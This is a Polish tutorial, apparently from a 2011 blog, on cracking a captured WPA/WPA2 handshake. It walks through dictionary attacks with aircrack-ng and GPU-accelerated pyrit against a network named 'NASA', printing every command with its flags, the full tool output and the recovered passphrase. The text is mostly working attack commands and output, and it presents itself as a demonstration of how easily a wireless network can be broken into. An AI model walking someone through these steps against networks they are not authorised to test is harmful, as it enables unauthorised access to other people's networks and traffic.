[
WiFi] – Ataki na handshake
WPA
Ten tutorial jest kontynuacją artykułu dotyczącego
pokazujący jak łatwo odzyskać hasło lub włamać się
do sieci bezprzewodowej chronionej przez WPA/WPA2.
No dobra, pokażę Ci jak łamać szyfr z handshake. Tak wygląda okno
programu airodump-ng gdy handshake został złapany, ale to już wiesz:
[
CH 1
][
Elapsed: 12 s
][
2011-01-12 17:24
][
WPA handshake:
00:04:ED:A3:80:11
]
BSSID PWR RXQ Beacons
#Data, #/s CH MB ENC CIPHER AUTH ESSID
00:04:
ED:A3:80:11
-53
40 130 27 9 1 54 WPA2 CCMP PSK NASA
BSSID STATION PWR Rate Lost Packets Probes
00:04:
ED:A3:80:11 48:5D:60:34:A8:59 0 0
-54
0 25 NASA
00:04:
ED:A3:80:11 00:4F:78:00:A2:A5
-40
24 - 1 28 25
Skoro już go masz to należy go teraz zepsuć!
Potrzebujemy do tego aircrack-ng żeby zepsuć, psujemy takim to
poleceniem:
aircrack-ng
-w
slownik.txt
-b
00:04:ED:A3:80:11 NASA.cap
[
00:05:48
]
664220
keys tested
(
2100.59 k/s
)
Current passphrase: imakinlazczsupzoR
Master Key : D9 06 78 99 66 B2 50 65 48 E1 99 7B 87 19 5F 7F
45
F8 F9 48 28 A2 7C EF A7 90 E5 5C 80 BC FC 9A
Transient Key : 1B 05 70 73 25 45 7C DB 1E 95 73 37 0C F7 F2 24
26 56
DD 2C 8B 09 0F 58 57 5F D8 4A EA D3 94 83
BC 48 F8 1E 84 4A 92 46 19 C3 48 BC 7B 21 6D 16
C3 19 AD 27 14 D0 76 33 44 32 65 FE 1F 8D 97 6C
EAPOL HMAC : 05 46 D3 00 99 FC A8 82 F8 CF C1 2B EC 87 F4 5F
W poleceniu użyto opcji ataku słownikowego, ponieważ mam bardzo duży
słownik to często go używam
Aircrack-ng 1.0
[
00:11:45
]
8914110
keys tested
(
2041.75 k/s
)
KEY FOUND!
[
haxored1
]
Master Key : C6 AC CD E4 AF 58 CA 8A 51 8E C4 BC A1 50 F9 DE
72 55 48
F6 E1 6F 26 23 2C 7F AA E6 8A 7F 98 6C
Transient Key : 86 CA 39 4F C6 9A C2 CD 2D 06 0F E9 83 E6 DE FC
3
F 24 70 D0 0C F6 B8 44 FB FE D5 5A 03 CF D3 94
06 90
AC C7 7F 41 EF DE DA 8D 72 89 B2 82 A3 4C
F1 69 2F E3 59 B9 73 1E A1 AF 67 57 DA 16 8A 11
EAPOL HMAC : 83 55 E7 96 C4 C4 96 C2 32 AF 5D 9B 40 81 AC F5
Zróbmy to szybciej!
W jednym z moich poprzednich tutoriali pokazywałem jak zainstalować
pyrit wraz z cpyrit dla kart ATI z OCL.
Użyjemy teraz projektu z Summer Google Code do ataku na handshake.
Narzędzie pyrit do tego ataku użyje mocy obliczeniowej CPU+GPU (u mnie
jest to i7 740QM + ATI HD5730)
Proszę pamiętać, że pyrit to narzędzie do doświadczeń crackingu (słowa
developera narzędzia).
Sprawdzamy czy w przechwyconych przez nas pakietach pyrit wykrywa
dane handshake.
$
pyrit
-r
NASA-01.cap analyze
Pyrit 0.4.0-dev
(
svn
r288
)
(
C
)
2008-2010 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing
file
'NASA-01.cap'
(
1/1
)
...
Parsed 7 packets
(
7 802.11-packets
)
, got 1 AP
(
s
)
#1:
AccessPoint 00:04:ed:a3:80:11 ('NASA'):
#1:
Station 00:1f:e1:02:dc:9e
#2:
Station 00:4f:78:00:a2:a5, 1 handshake(s):
#1:
HMAC_SHA1_AES, good, spread 1
#3:
Station 48:5d:60:34:a8:59
No skoro wykrywa to dowiedzmy się jakie jest hasło:
$
pyrit
-r
NASA-01.cap
-i
slownik.txt
-b
00:04:ED:A3:80:11 attack_passthrough
Pyrit 0.4.0-dev
(
svn
r288
)
(
C
)
2008-2010 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing
file
'NASA-01.cap'
(
1/1
)
...
Parsed 7 packets
(
7 802.11-packets
)
, got 1 AP
(
s
)
Tried 120006 PMKs so far; 12304 PMKs per second.
The password is
'haxored1'
.
pyrit
-r
NASA-01.cap
-i
slownik.txt
-b
00:04:ED:A3:80:11 attack_passthrough
•
-
r plik cap.
•
-
i podajemy ścieżkę do słownika, który chcesz przeszukać za hasłem
•
-
b <tutaj_bssid>
•
na końcu polecenia podaje się jaki ma być atak, dictionary-attack opisany
jest jakoattack_passthrough
Komentarz od-autorski:
Nie, nie warto używać tęczowych tablic do ataków na WPA/WPA2, stracisz
miesiące (lata?) na tworzenie takich tablic, hasło w tym czasie może
zostać zmienione, wtedy ponownie będzie trzeba uzyskać handshake. W
tym wypadku słowniki są najlepszym rozwiązaniem.